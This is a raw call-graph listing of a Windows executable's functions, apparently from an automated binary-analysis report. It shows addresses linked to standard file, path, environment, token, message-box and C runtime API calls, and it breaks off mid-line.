7ff65e2833c0 17188->17436 17579 7ff65e283360 17189->17579 17190->17189 17196 7ff65e283ef2 17194->17196 17200 7ff65e283e4e 17194->17200 17199 7ff65e288940 40 API calls 17196->17199 17199->17226 17200->17226 17505 7ff65e286dc0 17200->17505 17226->17186 17226->17188 17238 7ff65e299b43 17237->17238 17239 7ff65e299b64 17237->17239 17238->17083 17240 7ff65e29a3d8 45 API calls 17239->17240 17241 7ff65e299b69 17240->17241 17243 7ff65e28d2c9 17242->17243 17243->17092 17246 7ff65e28cfa1 17244->17246 17245 7ff65e28cd60 17245->17081 17246->17245 17247 7ff65e28d888 7 API calls 17246->17247 17247->17245 17249 7ff65e28d152 __CxxCallCatchBlock __scrt_get_show_window_mode 17248->17249 17250 7ff65e28d171 RtlCaptureContext RtlLookupFunctionEntry 17249->17250 17251 7ff65e28d1d6 __scrt_get_show_window_mode 17250->17251 17252 7ff65e28d19a RtlVirtualUnwind 17250->17252 17253 7ff65e28d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17251->17253 17252->17251 17254 7ff65e28d256 __CxxCallCatchBlock 17253->17254 17254->17079 17256 7ff65e28d890 17255->17256 17257 7ff65e28d89a 17255->17257 17261 7ff65e28dc24 17256->17261 17257->17097 17262 7ff65e28d895 17261->17262 17263 7ff65e28dc33 17261->17263 17265 7ff65e28dc90 17262->17265 17269 7ff65e28de60 17263->17269 17266 7ff65e28dcbb 17265->17266 17267 7ff65e28dc9e DeleteCriticalSection 17266->17267 17268 7ff65e28dcbf 17266->17268 17267->17266 17268->17257 17273 7ff65e28dcc8 17269->17273 17279 7ff65e28ddb2 TlsFree 17273->17279 17280 7ff65e28dd0c __vcrt_FlsAlloc 17273->17280 17274 7ff65e28dd3a LoadLibraryExW 17276 7ff65e28ddd9 17274->17276 17277 7ff65e28dd5b GetLastError 17274->17277 17275 7ff65e28ddf9 GetProcAddress 17275->17279 17276->17275 17278 7ff65e28ddf0 FreeLibrary 17276->17278 17277->17280 17278->17275 17280->17274 17280->17275 17280->17279 17281 7ff65e28dd7d LoadLibraryExW 17280->17281 17281->17276 17281->17280 17284 7ff65e29f480 17282->17284 17283 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17288 7ff65e29f4fc 17283->17288 17285 7ff65e29f526 17284->17285 17286 7ff65e29f4d3 17284->17286 17592 7ff65e29f358 17285->17592 17286->17283 17288->17106 17600 7ff65e28c850 17289->17600 17292 7ff65e2836eb GetLastError 17607 7ff65e282c50 17292->17607 17293 7ff65e283710 17602 7ff65e289280 FindFirstFileExW 17293->17602 17296 7ff65e283706 17301 7ff65e28c550 _log10_special 8 API calls 17296->17301 17298 7ff65e28377d 17633 7ff65e289440 17298->17633 17299 7ff65e283723 17622 7ff65e289300 CreateFileW 17299->17622 17304 7ff65e2837b5 17301->17304 17303 7ff65e28378b 17303->17296 17308 7ff65e282810 49 API calls 17303->17308 17304->17184 17311 7ff65e281950 17304->17311 17306 7ff65e28374c __vcrt_FlsAlloc 17306->17298 17307 7ff65e283734 17625 7ff65e282810 17307->17625 17308->17296 17312 7ff65e2845c0 108 API calls 17311->17312 17313 7ff65e281985 17312->17313 17315 7ff65e287f90 83 API calls 17313->17315 17321 7ff65e281c43 17313->17321 17314 7ff65e28c550 _log10_special 8 API calls 17317 7ff65e281c5e 17314->17317 17316 7ff65e2819cb 17315->17316 17360 7ff65e281a03 17316->17360 17978 7ff65e2906d4 17316->17978 17317->17113 17317->17114 17319 7ff65e29004c 74 API calls 17319->17321 17320 7ff65e2819e5 17322 7ff65e2819e9 17320->17322 17323 7ff65e281a08 17320->17323 17321->17314 17324 7ff65e294f08 _get_daylight 11 API calls 17322->17324 17982 7ff65e29039c 17323->17982 17326 7ff65e2819ee 17324->17326 17985 7ff65e282910 17326->17985 17329 7ff65e281a26 17331 7ff65e294f08 _get_daylight 11 API calls 17329->17331 17330 7ff65e281a45 17333 7ff65e281a5c 17330->17333 17334 7ff65e281a7b 17330->17334 17332 7ff65e281a2b 17331->17332 17335 7ff65e282910 54 API calls 17332->17335 17336 7ff65e294f08 _get_daylight 11 API calls 17333->17336 17337 7ff65e281c80 49 API calls 17334->17337 17335->17360 17338 7ff65e281a61 17336->17338 17339 7ff65e281a92 17337->17339 17340 7ff65e282910 54 API calls 17338->17340 17341 7ff65e281c80 49 API calls 17339->17341 17340->17360 17342 7ff65e281add 17341->17342 17343 7ff65e2906d4 73 API calls 17342->17343 17344 7ff65e281b01 17343->17344 17345 7ff65e281b16 17344->17345 17346 7ff65e281b35 17344->17346 17347 7ff65e294f08 _get_daylight 11 API calls 17345->17347 17348 7ff65e29039c _fread_nolock 53 API calls 17346->17348 17349 7ff65e281b1b 17347->17349 17350 7ff65e281b4a 17348->17350 17351 7ff65e282910 54 API calls 17349->17351 17352 7ff65e281b50 17350->17352 17353 7ff65e281b6f 17350->17353 17351->17360 17355 7ff65e294f08 _get_daylight 11 API calls 17352->17355 18000 7ff65e290110 17353->18000 17357 7ff65e281b55 17355->17357 17358 7ff65e282910 54 API calls 17357->17358 17358->17360 17359 7ff65e282710 54 API calls 17359->17360 17360->17319 17362 7ff65e28883a 17361->17362 17363 7ff65e289390 2 API calls 17362->17363 17364 7ff65e288859 GetEnvironmentVariableW 17363->17364 17365 7ff65e2888c2 17364->17365 17366 7ff65e288876 ExpandEnvironmentStringsW 17364->17366 17368 7ff65e28c550 _log10_special 8 API calls 17365->17368 17366->17365 17367 7ff65e288898 17366->17367 17369 7ff65e289440 2 API calls 17367->17369 17370 7ff65e2888d4 17368->17370 17371 7ff65e2888aa 17369->17371 17370->17121 17372 7ff65e28c550 _log10_special 8 API calls 17371->17372 17373 7ff65e2888ba 17372->17373 17373->17121 17375 7ff65e289390 2 API calls 17374->17375 17376 7ff65e28895c 17375->17376 17377 7ff65e289390 2 API calls 17376->17377 17378 7ff65e28896c 17377->17378 18215 7ff65e298238 17378->18215 17380 7ff65e28897a __vcrt_freefls 17380->17156 17382 7ff65e2890f5 17381->17382 18233 7ff65e288570 GetCurrentProcess OpenProcessToken 17382->18233 17385 7ff65e288570 7 API calls 17386 7ff65e289121 17385->17386 17387 7ff65e289154 17386->17387 17388 7ff65e28913a 17386->17388 17389 7ff65e2826b0 48 API calls 17387->17389 17390 7ff65e2826b0 48 API calls 17388->17390 17392 7ff65e289167 LocalFree LocalFree 17389->17392 17391 7ff65e289152 17390->17391 17391->17392 17393 7ff65e289183 17392->17393 17395 7ff65e28918f 17392->17395 18243 7ff65e282b50 17393->18243 17396 7ff65e28c550 _log10_special 8 API calls 17395->17396 17397 7ff65e283c55 17396->17397 17397->17177 17398 7ff65e288660 17397->17398 17399 7ff65e288678 17398->17399 17400 7ff65e2886fa GetTempPathW GetCurrentProcessId 17399->17400 17401 7ff65e28869c 17399->17401 18252 7ff65e2825c0 17400->18252 17403 7ff65e288830 14 API calls 17401->17403 17404 7ff65e2886a8 17403->17404 18259 7ff65e2881d0 17404->18259 17412 7ff65e288728 __vcrt_freefls 17421 7ff65e288765 __vcrt_freefls 17412->17421 18256 7ff65e298b68 17412->18256 17416 7ff65e28c550 _log10_special 8 API calls 17417 7ff65e283cbb 17416->17417 17417->17177 17417->17178 17422 7ff65e289390 2 API calls 17421->17422 17430 7ff65e2887d4 __vcrt_freefls 17421->17430 17423 7ff65e2887b1 17422->17423 17424 7ff65e2887b6 17423->17424 17425 7ff65e2887e9 17423->17425 17426 7ff65e289390 2 API calls 17424->17426 17427 7ff65e298238 38 API calls 17425->17427 17427->17430 17430->17416 17432 7ff65e2893d6 17431->17432 17433 7ff65e2893b2 MultiByteToWideChar 17431->17433 17434 7ff65e2893f3 MultiByteToWideChar 17432->17434 17435 7ff65e2893ec __vcrt_freefls 17432->17435 17433->17432 17433->17435 17434->17435 17435->17181 17448 7ff65e2833ce __scrt_get_show_window_mode 17436->17448 17437 7ff65e2835c7 17438 7ff65e28c550 _log10_special 8 API calls 17437->17438 17439 7ff65e283664 17438->17439 17439->17184 17455 7ff65e2890c0 LocalFree 17439->17455 17441 7ff65e281c80 49 API calls 17441->17448 17442 7ff65e2835e2 17444 7ff65e282710 54 API calls 17442->17444 17444->17437 17447 7ff65e2835c9 17450 7ff65e282710 54 API calls 17447->17450 17448->17437 17448->17441 17448->17442 17448->17447 17449 7ff65e282a50 54 API calls 17448->17449 17453 7ff65e2835d0 17448->17453 18421 7ff65e284560 17448->18421 18427 7ff65e287e20 17448->18427 18439 7ff65e281600 17448->18439 18487 7ff65e287120 17448->18487 18491 7ff65e284190 17448->18491 18535 7ff65e284450 17448->18535 17449->17448 17450->17437 17454 7ff65e282710 54 API calls 17453->17454 17454->17437 17457 7ff65e281ca5 17456->17457 17458 7ff65e294984 49 API calls 17457->17458 17459 7ff65e281cc8 17458->17459 17459->17118 17461 7ff65e289390 2 API calls 17460->17461 17462 7ff65e2889b4 17461->17462 17463 7ff65e298238 38 API calls 17462->17463 17464 7ff65e2889c6 __vcrt_freefls 17463->17464 17464->17131 17466 7ff65e2845cc 17465->17466 17467 7ff65e289390 2 API calls 17466->17467 17468 7ff65e2845f4 17467->17468 17469 7ff65e289390 2 API calls 17468->17469 17470 7ff65e284607 17469->17470 18702 7ff65e295f94 17470->18702 17473 7ff65e28c550 _log10_special 8 API calls 17474 7ff65e28392b 17473->17474 17474->17119 17475 7ff65e287f90 17474->17475 17476 7ff65e287fb4 17475->17476 17477 7ff65e28808b __vcrt_freefls 17476->17477 17478 7ff65e2906d4 73 API calls 17476->17478 17477->17124 17479 7ff65e287fd0 17478->17479 17479->17477 19093 7ff65e2978c8 17479->19093 17481 7ff65e287fe5 17481->17477 17482 7ff65e2906d4 73 API calls 17481->17482 17483 7ff65e29039c _fread_nolock 53 API calls 17481->17483 17482->17481 17483->17481 17485 7ff65e29007c 17484->17485 19108 7ff65e28fe28 17485->19108 17487 7ff65e290095 17487->17119 17489 7ff65e28c850 17488->17489 17490 7ff65e282734 GetCurrentProcessId 17489->17490 17491 7ff65e281c80 49 API calls 17490->17491 17492 7ff65e282787 17491->17492 17493 7ff65e294984 49 API calls 17492->17493 17494 7ff65e2827cf 17493->17494 17495 7ff65e282620 12 API calls 17494->17495 17496 7ff65e2827f1 17495->17496 17497 7ff65e28c550 _log10_special 8 API calls 17496->17497 17498 7ff65e282801 17497->17498 17498->17184 17500 7ff65e281c80 49 API calls 17499->17500 17501 7ff65e2844fd 17500->17501 17501->17162 17503 7ff65e281c80 49 API calls 17502->17503 17504 7ff65e284660 17503->17504 17504->17178 17506 7ff65e286dd5 17505->17506 17507 7ff65e283e6c 17506->17507 17508 7ff65e294f08 _get_daylight 11 API calls 17506->17508 17511 7ff65e287340 17507->17511 17509 7ff65e286de2 17508->17509 17510 7ff65e282910 54 API calls 17509->17510 17510->17507 19119 7ff65e281470 17511->19119 19225 7ff65e286360 17579->19225 17587 7ff65e283399 17599 7ff65e29546c EnterCriticalSection 17592->17599 17601 7ff65e2836bc GetModuleFileNameW 17600->17601 17601->17292 17601->17293 17603 7ff65e2892bf FindClose 17602->17603 17604 7ff65e2892d2 17602->17604 17603->17604 17605 7ff65e28c550 _log10_special 8 API calls 17604->17605 17606 7ff65e28371a 17605->17606 17606->17298 17606->17299 17608 7ff65e28c850 17607->17608 17609 7ff65e282c70 GetCurrentProcessId 17608->17609 17638 7ff65e2826b0 17609->17638 17611 7ff65e282cb9 17642 7ff65e294bd8 17611->17642 17614 7ff65e2826b0 48 API calls 17615 7ff65e282d34 FormatMessageW 17614->17615 17617 7ff65e282d6d 17615->17617 17618 7ff65e282d7f MessageBoxW 17615->17618 17619 7ff65e2826b0 48 API calls 17617->17619 17620 7ff65e28c550 _log10_special 8 API calls 17618->17620 17619->17618 17621 7ff65e282daf 17620->17621 17621->17296 17623 7ff65e289340 GetFinalPathNameByHandleW CloseHandle 17622->17623 17624 7ff65e283730 17622->17624 17623->17624 17624->17306 17624->17307 17626 7ff65e282834 17625->17626 17627 7ff65e2826b0 48 API calls 17626->17627 17628 7ff65e282887 17627->17628 17629 7ff65e294bd8 48 API calls 17628->17629 17630 7ff65e2828d0 MessageBoxW 17629->17630 17631 7ff65e28c550 _log10_special 8 API calls 17630->17631 17632 7ff65e282900 17631->17632 17632->17296 17634 7ff65e289495 17633->17634 17635 7ff65e28946a WideCharToMultiByte 17633->17635 17636 7ff65e2894b2 WideCharToMultiByte 17634->17636 17637 7ff65e2894ab __vcrt_freefls 17634->17637 17635->17634 17635->17637 17636->17637 17637->17303 17639 7ff65e2826d5 17638->17639 17640 7ff65e294bd8 48 API calls 17639->17640 17641 7ff65e2826f8 17640->17641 17641->17611 17644 7ff65e294c32 17642->17644 17643 7ff65e294c57 17646 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17643->17646 17644->17643 17645 7ff65e294c93 17644->17645 17660 7ff65e292f90 17645->17660 17659 7ff65e294c81 17646->17659 17648 7ff65e294d74 17649 7ff65e29a948 __free_lconv_mon 11 API calls 17648->17649 17649->17659 17650 7ff65e28c550 _log10_special 8 API calls 17652 7ff65e282d04 17650->17652 17652->17614 17653 7ff65e294d49 17657 7ff65e29a948 __free_lconv_mon 11 API calls 17653->17657 17654 7ff65e294d9a 17654->17648 17656 7ff65e294da4 17654->17656 17655 7ff65e294d40 17655->17648 17655->17653 17658 7ff65e29a948 __free_lconv_mon 11 API calls 17656->17658 17657->17659 17658->17659 17659->17650 17661 7ff65e292fce 17660->17661 17662 7ff65e292fbe 17660->17662 17663 7ff65e292fd7 17661->17663 17667 7ff65e293005 17661->17667 17664 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17662->17664 17665 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17663->17665 17666 7ff65e292ffd 17664->17666 17665->17666 17666->17648 17666->17653 17666->17654 17666->17655 17667->17662 17667->17666 17671 7ff65e2939a4 17667->17671 17704 7ff65e2933f0 17667->17704 17741 7ff65e292b80 17667->17741 17672 7ff65e2939e6 17671->17672 17673 7ff65e293a57 17671->17673 17674 7ff65e293a81 17672->17674 17675 7ff65e2939ec 17672->17675 17676 7ff65e293ab0 17673->17676 17677 7ff65e293a5c 17673->17677 17764 7ff65e291d54 17674->17764 17678 7ff65e293a20 17675->17678 17679 7ff65e2939f1 17675->17679 17683 7ff65e293ac7 17676->17683 17685 7ff65e293aba 17676->17685 17689 7ff65e293abf 17676->17689 17680 7ff65e293a5e 17677->17680 17681 7ff65e293a91 17677->17681 17686 7ff65e2939f7 17678->17686 17678->17689 17679->17683 17679->17686 17684 7ff65e293a00 17680->17684 17693 7ff65e293a6d 17680->17693 17771 7ff65e291944 17681->17771 17778 7ff65e2946ac 17683->17778 17702 7ff65e293af0 17684->17702 17744 7ff65e294158 17684->17744 17685->17674 17685->17689 17686->17684 17692 7ff65e293a32 17686->17692 17700 7ff65e293a1b 17686->17700 17689->17702 17782 7ff65e292164 17689->17782 17692->17702 17754 7ff65e294494 17692->17754 17693->17674 17694 7ff65e293a72 17693->17694 17694->17702 17760 7ff65e294558 17694->17760 17696 7ff65e28c550 _log10_special 8 API calls 17697 7ff65e293dea 17696->17697 17697->17667 17700->17702 17703 7ff65e293cdc 17700->17703 17789 7ff65e2947c0 17700->17789 17702->17696 17703->17702 17795 7ff65e29ea08 17703->17795 17705 7ff65e2933fe 17704->17705 17706 7ff65e293414 17704->17706 17707 7ff65e293454 17705->17707 17709 7ff65e2939e6 17705->17709 17710 7ff65e293a57 17705->17710 17706->17707 17708 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17706->17708 17707->17667 17708->17707 17711 7ff65e293a81 17709->17711 17712 7ff65e2939ec 17709->17712 17713 7ff65e293ab0 17710->17713 17714 7ff65e293a5c 17710->17714 17719 7ff65e291d54 38 API calls 17711->17719 17715 7ff65e293a20 17712->17715 17716 7ff65e2939f1 17712->17716 17720 7ff65e293ac7 17713->17720 17722 7ff65e293aba 17713->17722 17726 7ff65e293abf 17713->17726 17717 7ff65e293a5e 17714->17717 17718 7ff65e293a91 17714->17718 17723 7ff65e2939f7 17715->17723 17715->17726 17716->17720 17716->17723 17721 7ff65e293a00 17717->17721 17729 7ff65e293a6d 17717->17729 17724 7ff65e291944 38 API calls 17718->17724 17736 7ff65e293a1b 17719->17736 17727 7ff65e2946ac 45 API calls 17720->17727 17725 7ff65e294158 47 API calls 17721->17725 17740 7ff65e293af0 17721->17740 17722->17711 17722->17726 17723->17721 17730 7ff65e293a32 17723->17730 17723->17736 17724->17736 17725->17736 17728 7ff65e292164 38 API calls 17726->17728 17726->17740 17727->17736 17728->17736 17729->17711 17731 7ff65e293a72 17729->17731 17732 7ff65e294494 46 API calls 17730->17732 17730->17740 17734 7ff65e294558 37 API calls 17731->17734 17731->17740 17732->17736 17733 7ff65e28c550 _log10_special 8 API calls 17735 7ff65e293dea 17733->17735 17734->17736 17735->17667 17737 7ff65e293cdc 17736->17737 17738 7ff65e2947c0 45 API calls 17736->17738 17736->17740 17739 7ff65e29ea08 46 API calls 17737->17739 17737->17740 17738->17737 17739->17737 17740->17733 17961 7ff65e290fc8 17741->17961 17745 7ff65e29417e 17744->17745 17807 7ff65e290b80 17745->17807 17750 7ff65e2947c0 45 API calls 17752 7ff65e2942c3 17750->17752 17751 7ff65e2947c0 45 API calls 17753 7ff65e294351 17751->17753 17752->17751 17752->17752 17752->17753 17753->17700 17755 7ff65e2944c9 17754->17755 17756 7ff65e2944e7 17755->17756 17757 7ff65e29450e 17755->17757 17758 7ff65e2947c0 45 API calls 17755->17758 17759 7ff65e29ea08 46 API calls 17756->17759 17757->17700 17758->17756 17759->17757 17762 7ff65e294579 17760->17762 17761 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17763 7ff65e2945aa 17761->17763 17762->17761 17762->17763 17763->17700 17766 7ff65e291d87 17764->17766 17765 7ff65e291db6 17770 7ff65e291df3 17765->17770 17934 7ff65e290c28 17765->17934 17766->17765 17768 7ff65e291e73 17766->17768 17769 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17768->17769 17769->17770 17770->17700 17772 7ff65e291977 17771->17772 17773 7ff65e2919a6 17772->17773 17775 7ff65e291a63 17772->17775 17774 7ff65e290c28 12 API calls 17773->17774 17777 7ff65e2919e3 17773->17777 17774->17777 17776 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17775->17776 17776->17777 17777->17700 17779 7ff65e2946ef 17778->17779 17781 7ff65e2946f3 __crtLCMapStringW 17779->17781 17942 7ff65e294748 17779->17942 17781->17700 17783 7ff65e292197 17782->17783 17784 7ff65e2921c6 17783->17784 17786 7ff65e292283 17783->17786 17785 7ff65e290c28 12 API calls 17784->17785 17788 7ff65e292203 17784->17788 17785->17788 17787 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17786->17787 17787->17788 17788->17700 17790 7ff65e2947d7 17789->17790 17946 7ff65e29d9b8 17790->17946 17796 7ff65e29ea39 17795->17796 17805 7ff65e29ea47 17795->17805 17797 7ff65e29ea67 17796->17797 17798 7ff65e2947c0 45 API calls 17796->17798 17796->17805 17799 7ff65e29ea9f 17797->17799 17800 7ff65e29ea78 17797->17800 17798->17797 17802 7ff65e29eac9 17799->17802 17803 7ff65e29eb2a 17799->17803 17799->17805 17954 7ff65e2a00a0 17800->17954 17802->17805 17806 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 17802->17806 17804 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 17803->17804 17804->17805 17805->17703 17806->17805 17808 7ff65e290bb7 17807->17808 17814 7ff65e290ba6 17807->17814 17809 7ff65e29d5fc _fread_nolock 12 API calls 17808->17809 17808->17814 17810 7ff65e290be4 17809->17810 17811 7ff65e29a948 __free_lconv_mon 11 API calls 17810->17811 17813 7ff65e290bf8 17810->17813 17811->17813 17812 7ff65e29a948 __free_lconv_mon 11 API calls 17812->17814 17813->17812 17815 7ff65e29e570 17814->17815 17816 7ff65e29e5c0 17815->17816 17817 7ff65e29e58d 17815->17817 17816->17817 17819 7ff65e29e5f2 17816->17819 17818 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17817->17818 17834 7ff65e2942a1 17818->17834 17824 7ff65e29e705 17819->17824 17827 7ff65e29e63a 17819->17827 17820 7ff65e29e7f7 17861 7ff65e29da5c 17820->17861 17822 7ff65e29e7bd 17854 7ff65e29ddf4 17822->17854 17824->17820 17824->17822 17825 7ff65e29e78c 17824->17825 17828 7ff65e29e74f 17824->17828 17829 7ff65e29e745 17824->17829 17847 7ff65e29e0d4 17825->17847 17832 7ff65e29a4a4 __std_exception_copy 37 API calls 17827->17832 17827->17834 17837 7ff65e29e304 17828->17837 17829->17822 17831 7ff65e29e74a 17829->17831 17831->17825 17831->17828 17833 7ff65e29e6f2 17832->17833 17833->17834 17835 7ff65e29a900 _isindst 17 API calls 17833->17835 17834->17750 17834->17752 17836 7ff65e29e854 17835->17836 17870 7ff65e2a40ac 17837->17870 17841 7ff65e29e3ac 17842 7ff65e29e3b0 17841->17842 17843 7ff65e29e401 17841->17843 17845 7ff65e29e3cc 17841->17845 17842->17834 17923 7ff65e29def0 17843->17923 17919 7ff65e29e1ac 17845->17919 17848 7ff65e2a40ac 38 API calls 17847->17848 17849 7ff65e29e11e 17848->17849 17850 7ff65e2a3af4 37 API calls 17849->17850 17851 7ff65e29e16e 17850->17851 17852 7ff65e29e172 17851->17852 17853 7ff65e29e1ac 45 API calls 17851->17853 17852->17834 17853->17852 17855 7ff65e2a40ac 38 API calls 17854->17855 17856 7ff65e29de3f 17855->17856 17857 7ff65e2a3af4 37 API calls 17856->17857 17858 7ff65e29de97 17857->17858 17859 7ff65e29de9b 17858->17859 17860 7ff65e29def0 45 API calls 17858->17860 17859->17834 17860->17859 17862 7ff65e29daa1 17861->17862 17863 7ff65e29dad4 17861->17863 17865 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17862->17865 17864 7ff65e29daec 17863->17864 17867 7ff65e29db6d 17863->17867 17866 7ff65e29ddf4 46 API calls 17864->17866 17869 7ff65e29dacd __scrt_get_show_window_mode 17865->17869 17866->17869 17868 7ff65e2947c0 45 API calls 17867->17868 17867->17869 17868->17869 17869->17834 17871 7ff65e2a40ff fegetenv 17870->17871 17872 7ff65e2a7e2c 37 API calls 17871->17872 17877 7ff65e2a4152 17872->17877 17873 7ff65e2a417f 17876 7ff65e29a4a4 __std_exception_copy 37 API calls 17873->17876 17874 7ff65e2a4242 17875 7ff65e2a7e2c 37 API calls 17874->17875 17878 7ff65e2a426c 17875->17878 17879 7ff65e2a41fd 17876->17879 17877->17874 17880 7ff65e2a416d 17877->17880 17881 7ff65e2a421c 17877->17881 17882 7ff65e2a7e2c 37 API calls 17878->17882 17883 7ff65e2a5324 17879->17883 17889 7ff65e2a4205 17879->17889 17880->17873 17880->17874 17884 7ff65e29a4a4 __std_exception_copy 37 API calls 17881->17884 17885 7ff65e2a427d 17882->17885 17887 7ff65e29a900 _isindst 17 API calls 17883->17887 17884->17879 17886 7ff65e2a8020 20 API calls 17885->17886 17898 7ff65e2a42e6 __scrt_get_show_window_mode 17886->17898 17888 7ff65e2a5339 17887->17888 17890 7ff65e28c550 _log10_special 8 API calls 17889->17890 17891 7ff65e29e351 17890->17891 17915 7ff65e2a3af4 17891->17915 17892 7ff65e2a468f __scrt_get_show_window_mode 17893 7ff65e2a49cf 17894 7ff65e2a3c10 37 API calls 17893->17894 17904 7ff65e2a50e7 17894->17904 17895 7ff65e2a497b 17895->17893 17899 7ff65e2a533c memcpy_s 37 API calls 17895->17899 17896 7ff65e2a5142 17900 7ff65e2a52c8 17896->17900 17911 7ff65e2a3c10 37 API calls 17896->17911 17913 7ff65e2a533c memcpy_s 37 API calls 17896->17913 17897 7ff65e2a4327 memcpy_s 17902 7ff65e2a4783 memcpy_s __scrt_get_show_window_mode 17897->17902 17906 7ff65e2a4c6b memcpy_s __scrt_get_show_window_mode 17897->17906 17898->17892 17898->17897 17901 7ff65e294f08 _get_daylight 11 API calls 17898->17901 17899->17893 17908 7ff65e2a7e2c 37 API calls 17900->17908 17903 7ff65e2a4760 17901->17903 17902->17895 17910 7ff65e294f08 11 API calls _get_daylight 17902->17910 17912 7ff65e29a8e0 37 API calls _invalid_parameter_noinfo 17902->17912 17905 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 17903->17905 17904->17896 17907 7ff65e2a533c memcpy_s 37 API calls 17904->17907 17905->17897 17906->17893 17906->17895 17909 7ff65e294f08 11 API calls _get_daylight 17906->17909 17914 7ff65e29a8e0 37 API calls _invalid_parameter_noinfo 17906->17914 17907->17896 17908->17889 17909->17906 17910->17902 17911->17896 17912->17902 17913->17896 17914->17906 17916 7ff65e2a3b13 17915->17916 17917 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17916->17917 17918 7ff65e2a3b3e memcpy_s 17916->17918 17917->17918 17918->17841 17920 7ff65e29e1d8 memcpy_s 17919->17920 17921 7ff65e2947c0 45 API calls 17920->17921 17922 7ff65e29e292 memcpy_s __scrt_get_show_window_mode 17920->17922 17921->17922 17922->17842 17924 7ff65e29df2b 17923->17924 17928 7ff65e29df78 memcpy_s 17923->17928 17925 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17924->17925 17926 7ff65e29df57 17925->17926 17926->17842 17927 7ff65e29dfe3 17929 7ff65e29a4a4 __std_exception_copy 37 API calls 17927->17929 17928->17927 17930 7ff65e2947c0 45 API calls 17928->17930 17933 7ff65e29e025 memcpy_s 17929->17933 17930->17927 17931 7ff65e29a900 _isindst 17 API calls 17932 7ff65e29e0d0 17931->17932 17933->17931 17935 7ff65e290c5f 17934->17935 17936 7ff65e290c4e 17934->17936 17935->17936 17937 7ff65e29d5fc _fread_nolock 12 API calls 17935->17937 17936->17770 17938 7ff65e290c90 17937->17938 17939 7ff65e290ca4 17938->17939 17940 7ff65e29a948 __free_lconv_mon 11 API calls 17938->17940 17941 7ff65e29a948 __free_lconv_mon 11 API calls 17939->17941 17940->17939 17941->17936 17943 7ff65e29476e 17942->17943 17944 7ff65e294766 17942->17944 17943->17781 17945 7ff65e2947c0 45 API calls 17944->17945 17945->17943 17947 7ff65e29d9d1 17946->17947 17948 7ff65e2947ff 17946->17948 17947->17948 17949 7ff65e2a3304 45 API calls 17947->17949 17950 7ff65e29da24 17948->17950 17949->17948 17951 7ff65e29480f 17950->17951 17952 7ff65e29da3d 17950->17952 17951->17703 17952->17951 17953 7ff65e2a2650 45 API calls 17952->17953 17953->17951 17957 7ff65e2a6d88 17954->17957 17959 7ff65e2a6dec 17957->17959 17958 7ff65e28c550 _log10_special 8 API calls 17960 7ff65e2a00bd 17958->17960 17959->17958 17960->17805 17962 7ff65e29100f 17961->17962 17963 7ff65e290ffd 17961->17963 17965 7ff65e291059 17962->17965 17967 7ff65e29101d 17962->17967 17964 7ff65e294f08 _get_daylight 11 API calls 17963->17964 17966 7ff65e291002 17964->17966 17970 7ff65e2913d5 17965->17970 17972 7ff65e294f08 _get_daylight 11 API calls 17965->17972 17968 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 17966->17968 17969 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17967->17969 17977 7ff65e29100d 17968->17977 17969->17977 17971 7ff65e294f08 _get_daylight 11 API calls 17970->17971 17970->17977 17973 7ff65e291669 17971->17973 17974 7ff65e2913ca 17972->17974 17975 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 17973->17975 17976 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 17974->17976 17975->17977 17976->17970 17977->17667 17979 7ff65e290704 17978->17979 18006 7ff65e290464 17979->18006 17981 7ff65e29071d 17981->17320 18018 7ff65e2903bc 17982->18018 17986 7ff65e28c850 17985->17986 17987 7ff65e282930 GetCurrentProcessId 17986->17987 17988 7ff65e281c80 49 API calls 17987->17988 17989 7ff65e282979 17988->17989 18032 7ff65e294984 17989->18032 17994 7ff65e281c80 49 API calls 17995 7ff65e2829ff 17994->17995 18062 7ff65e282620 17995->18062 17998 7ff65e28c550 _log10_special 8 API calls 17999 7ff65e282a31 17998->17999 17999->17360 18001 7ff65e290119 18000->18001 18005 7ff65e281b89 18000->18005 18002 7ff65e294f08 _get_daylight 11 API calls 18001->18002 18003 7ff65e29011e 18002->18003 18004 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18003->18004 18004->18005 18005->17359 18005->17360 18007 7ff65e2904ce 18006->18007 18008 7ff65e29048e 18006->18008 18007->18008 18010 7ff65e2904da 18007->18010 18009 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18008->18009 18011 7ff65e2904b5 18009->18011 18017 7ff65e29546c EnterCriticalSection 18010->18017 18011->17981 18019 7ff65e281a20 18018->18019 18020 7ff65e2903e6 18018->18020 18019->17329 18019->17330 18020->18019 18021 7ff65e290432 18020->18021 18022 7ff65e2903f5 __scrt_get_show_window_mode 18020->18022 18031 7ff65e29546c EnterCriticalSection 18021->18031 18024 7ff65e294f08 _get_daylight 11 API calls 18022->18024 18026 7ff65e29040a 18024->18026 18028 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18026->18028 18028->18019 18034 7ff65e2949de 18032->18034 18033 7ff65e294a03 18035 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18033->18035 18034->18033 18036 7ff65e294a3f 18034->18036 18049 7ff65e294a2d 18035->18049 18071 7ff65e292c10 18036->18071 18039 7ff65e28c550 _log10_special 8 API calls 18042 7ff65e2829c3 18039->18042 18040 7ff65e29a948 __free_lconv_mon 11 API calls 18040->18049 18041 7ff65e294ae8 18043 7ff65e294b1c 18041->18043 18045 7ff65e294af1 18041->18045 18050 7ff65e295160 18042->18050 18043->18040 18044 7ff65e294b40 18044->18043 18046 7ff65e294b4a 18044->18046 18047 7ff65e29a948 __free_lconv_mon 11 API 